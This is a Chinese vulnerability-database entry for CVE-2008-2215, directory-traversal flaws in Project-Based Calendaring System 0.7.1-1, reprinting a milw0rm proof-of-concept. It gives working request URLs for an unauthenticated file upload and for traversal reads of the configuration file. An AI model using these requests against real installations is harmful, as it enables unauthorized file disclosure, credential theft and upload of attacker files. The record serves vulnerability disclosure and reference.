Project-Based Calendaring System 多个目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115098 漏洞类型 路径遍历
发布时间 2008-04-30 更新时间 2008-09-05
CVE编号 CVE-2008-2215 CNNVD-ID CNNVD-200805-175
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/5523
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200805-175
|漏洞详情
Project-BasedCalendaringSystem(PBCS)0.7.1-1版本存在多个目录遍历漏洞。远程攻击者可以借助文件名参数中的".."(参数中包含'..'),读取任意文件。该文件名参数是发送到(1)src/yopy_sync.php和(2)system-logger/print_logs.php的参数。
|漏洞EXP
Project Based Calendaring System (PBCS) Version 0.7.1 Multiple Vulnerabilities
Script: http://www.pbcs.org/pbcs_download.php
Poc : 
Hi str0ke Thanx To Posted but I Want Add Some Vulns In This Script
1- remote file upload
http://localhost/pbcs-0.7.1-1/src/yopy_upload.php
after upload you can get you file on
http://localhost/pbcs-0.7.1-1//tmp/uploads/name your file
2- remote file disclosure
http://localhost/pbcs-0.7.1-1/src/yopy_sync.php?download_file=0&filename=../config/config.php
3- file disclosure
/plugins/system-logger/print_logs.php?filename=../../config/config.php

# milw0rm.com [2008-04-30]
|参考资料

来源:XF
名称:pbcs-filename-directory-traversal(42106)
链接:http://xforce.iss.net/xforce/xfdb/42106
来源:BID
名称:28991
链接:http://www.securityfocus.com/bid/28991
来源:MILW0RM
名称:5523
链接:http://www.milw0rm.com/exploits/5523
来源:SECUNIA
名称:30015
链接:http://secunia.com/advisories/30015